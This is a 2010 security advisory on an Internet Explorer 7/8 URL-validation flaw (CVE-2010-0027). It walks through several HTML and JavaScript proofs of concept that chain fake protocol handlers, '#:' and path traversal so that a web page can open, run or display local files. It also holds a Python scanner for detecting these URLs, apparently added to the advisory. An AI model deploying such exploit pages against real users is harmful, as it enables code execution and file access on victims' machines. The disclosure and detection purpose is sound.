Internet Explorer 7 / 8 URL Validation

Source: packetstormsecurity.com (PACKETSTORM:86146)
Author: Lostmon
Published: 2010-02-10

EPSS: 0.96 (High); percentile: 99.3%

############################################
Internet Explorer 7 & 8 URL validation vulnerability
Original Advisory: http://lostmon.blogspot.com/2010/02/internet-explorer-7-8-url-validation.html
Vendor URL: http://www.microsoft.com
Related adv: http://lostmon.blogspot.com/2010/02/internet-explorer-6-7-8-url-validation.html
Related bulletins: MS10-002 and MS10-007
Related CVE: CVE-2010-0027
Related OSVDB ID: 62245 and 62245
Related Secunia: SA38501 and SA38209
Related BID: 37884
############################################
  
  
############  
Description  
############  
  
  
A remote code execution vulnerability exists in the way  
that Internet Explorer incorrectly validates input. An  
attacker could exploit the vulnerability by constructing  
a specially crafted URL. When a user clicks the URL, the  
vulnerability could allow remote code execution. An  
attacker who successfully exploited this vulnerability  
could gain the same user rights as the logged-on user.  
If a user is logged on with administrative user rights,  
  
  
#################
Versions affected
#################

I have tested in Internet Explorer 7 & 8
on these versions of Windows:

All versions of Windows 7
Windows XP Home
Windows XP Pro

See the exploitability index in the related Microsoft
bulletins for a complete list of affected products.
  
#############  
Timeline  
#############  
  
Discovered: 05-11-2009
Reported to vendor: 15-11-2009
Vendor response: 15-11-2009
Vendor accepts in case manager: 19-11-2009
Vendor patch: 21-01-2010
Vendor patch 2: 09-02-2010
Public disclosure: 21-01-2010
Details disclosure: 10-02-2010
  
  
##############  
Solution  
##############  
  
See
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
and
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx

for more details and to download the vendor's patch.
  
#######################  
Sample code and PoCs
#######################  
  
This vulnerability is based on the way that Internet Explorer
validates URI handlers and the special character '#'.

For testing and understanding, first open Internet Explorer
and type a fake handler like 'handler:' in the address bar.
This causes IE to show the internal page
'res://ieframe.dll/unknownprotocol.htm', because the protocol is unknown.
If we do => handler:http://[some-host]' IE waits to open
the host, but doesn't show any error or unknown protocol
error page.

If we write 'handler:handler2:' in the address bar,
IE shows the 'res://ieframe.dll/unknownprotocol.htm' page again.

But if we concatenate two unknown protocol handlers and
use the special char '#' like 'handler:handler#:',
Internet Explorer shows an alert warning
with 'Internet Explorer can't find file:///'.

With this combination IE uses the file: protocol handler.

With this alert we can think... if we concatenate two handlers, the #
char and a file path, we can access files on the hard disk.

"handler:handler#:c:\windows\calc.exe'
But we get 'Internet Explorer can't find the file' again.

Then we look for traversal file access like
handler:handler#:../../../../C:\windows/calc.exe'
Then IE prompts us to download or execute the file.
We have bypassed the restrictions!!!

So far we are working in the address bar.
Can a web page use this issue to do the same and ask
to download it? YES

We can construct a web page with an iframe like:
  
############# PoC one #################
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\windows/calc.exe">
</iframe>
</html>
################# EOF #################
  
If we open it via a local folder, or via a local server,
LAN server or remote server, in all cases IE asks to download.

Then we can access any file on the hard disk, so
can we execute or read the content of a file?? YES

If we know a txt file path we can do the same
(put a txt file in the C: root and write some content in it)
and then:
  
############## PoC Two #############
<html>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\our_txtfile.txt">
</iframe>
</html>

############# EOF #################
  
When we open this PoC, it reads the content from our_txtfile.txt
and shows it in the frame.


Can we execute files?? YES

We can execute an html file, xml file or search-ms file
from the hard disk, for example:
  
############# PoC Tree ###############  
<html>  
<iframe id="myIframe"  
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms">  
</iframe>  
</html>  
  
############### EOF ###########  
  
If we look, it executes Explorer with a local search :D


Can we read the content of any file and upload it to a server or
manage the content??

I haven't found a way to do it;
every time Internet Explorer denies access to the content from the
iframe.
  
############# PoC four ##############  
  
<html>  
<head>  
</head>  
<body>  
<script type="text/javascript">  
function getContentFromIframe(iFrameName)  
{  
var myIFrame = document.getElementById(iFrameName);  
var content = myIFrame.contentWindow.document.body.innerHTML;  
alert('content: ' + content);  
  
content = 'change iframe content';  
myIFrame.contentWindow.document.body.innerHTML = content;  
}  
</script>
<iframe id="myIframe"
src="handler:handler#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms"></iframe>
  
<a href="#" onclick="getContentFromIframe('myIframe')">Get the content</a>  
  
</body>  
</html>  
  
##################### EOF #############################  
  
It gives an access denied error.
If we try to use XMLHttpRequest()

it does not work either and access is denied:
  
########### PoC Five ######################
var contents;
var req = new XMLHttpRequest();
req.onreadystatechange = processReqChange;
// the URL contains a single quote, so it is wrapped in double quotes
req.open("GET",
"handler:document.write%28'shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",
true);
req.send("");
// callback referenced above; not defined in the original fragment
function processReqChange() {
  if (req.readyState == 4) { contents = req.responseText; alert(contents); }
}
############ EOF #############
  
If we use it as an ActiveX object it
shows access denied again :P
  
############### PoC six #############  
  
<html><body><div>

<script>
function getHTTPObject()
{
  if (typeof XMLHttpRequest != 'undefined')
  {
    return new XMLHttpRequest();
  }
  try
  {
    return new ActiveXObject("Msxml2.XMLHTTP");
  }
  catch (e)
  {
    try
    {
      return new ActiveXObject("Microsoft.XMLHTTP");
    }
    catch (e) {}
  }
  return false;
}
x = getHTTPObject();
x.open("GET","shit:shit#:../../../../C:\Users\Lostmon\Searches\Everywhere.search-ms",false);
x.send(null);
alert(x.responseText);

</script>

</div></body></html>
  
################ EOF ######################  
  
So we can conclude that we can read txt files, execute html, xml and
search-ms files, and download and execute binary files from the
victim's hard disk, only by viewing a crafted web page.
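The URL shape the advisory walks through (an unknown scheme, a second scheme, '#:' and then a traversal or drive path) is easy to flag in a proxy log or a page scanner. The following Python is an added example, not part of Lostmon's advisory; the sample HTML and log line are constructed, and C:\Users\victim is a placeholder path.

```python
import re
from urllib.parse import unquote

# URL shape from the advisory: <scheme>:<second scheme>#:<path>. The '#:' makes
# IE fall back to the file: handler; '../' segments or a drive letter then reach
# the local disk. The inner scheme may not contain ':', '#', '/' or whitespace,
# which keeps ordinary http://host/page#:frag URLs from matching.
NESTED_HANDLER = re.compile(
    r"^(?P<outer>[a-z][a-z0-9+.-]*):(?P<inner>[^:#/\s]*)#:(?P<path>.*)$",
    re.IGNORECASE,
)
LOCAL_PATH = re.compile(r"(\.\./|\.\.\\|^[a-z]:[\\/])", re.IGNORECASE)
# src="..." / href="..." attribute values inside HTML
ATTR = re.compile(r"""(?:src|href)\s*=\s*["']([^"']+)["']""", re.IGNORECASE)


def classify_url(url):
    """"high" for a nested-handler URL pointing at a local path, "low" for the
    bare handler:handler#: shape, None otherwise. Percent-encoding is decoded
    first, as PoC five encodes '(' as %28."""
    m = NESTED_HANDLER.match(unquote(url.strip()))
    if not m:
        return None
    return "high" if LOCAL_PATH.search(m.group("path")) else "low"


def find_suspicious(text):
    """Scan HTML or log text line by line; returns [(severity, url), ...].
    HTML lines are checked on their src/href values, other lines token by token."""
    hits = []
    for line in text.splitlines():
        candidates = ATTR.findall(line) or line.split()
        for cand in candidates:
            sev = classify_url(cand)
            if sev:
                hits.append((sev, cand))
    return hits


# Constructed sample: two iframe tags and a link from a page, plus one proxy
# log line. C:\Users\victim is a placeholder path, not one from the advisory.
SAMPLE = (
    '<iframe id="f1" src="handler:handler#:../../../../C:\\windows/calc.exe"></iframe>\n'
    '<a href="http://example.com/docs#:anchor">docs</a>\n'
    '<iframe id="f2" src="handler:handler2:"></iframe>\n'
    "2010-02-10T10:00:00Z proxy GET shift:shift#:../../../../C:\\Users\\victim\\Searches\\Everywhere.search-ms\n"
)

if __name__ == "__main__":
    for sev, url in find_suspicious(SAMPLE):
        print(sev, url)
```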
  
Microsoft has patched it and has released security bulletins
that solve this issue; see
http://www.microsoft.com/technet/security/Bulletin/ms10-002.mspx
and
http://www.microsoft.com/technet/security/Bulletin/ms10-007.mspx
for details and to download the security update that solves this
issue and seven more vulnerabilities.
  
#################### End ################
  
Thnx to the Google Security Team for their support
Thnx to MSRC for their support and acknowledgments
Thnx to icar0 & sha0 from Badchecksum
Thnx to Brink for testing with me on some Windows versions :D
Thnx to estrella for being my light
  
--
Sincerely:
Lostmon ([email protected])
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what moves the mind....
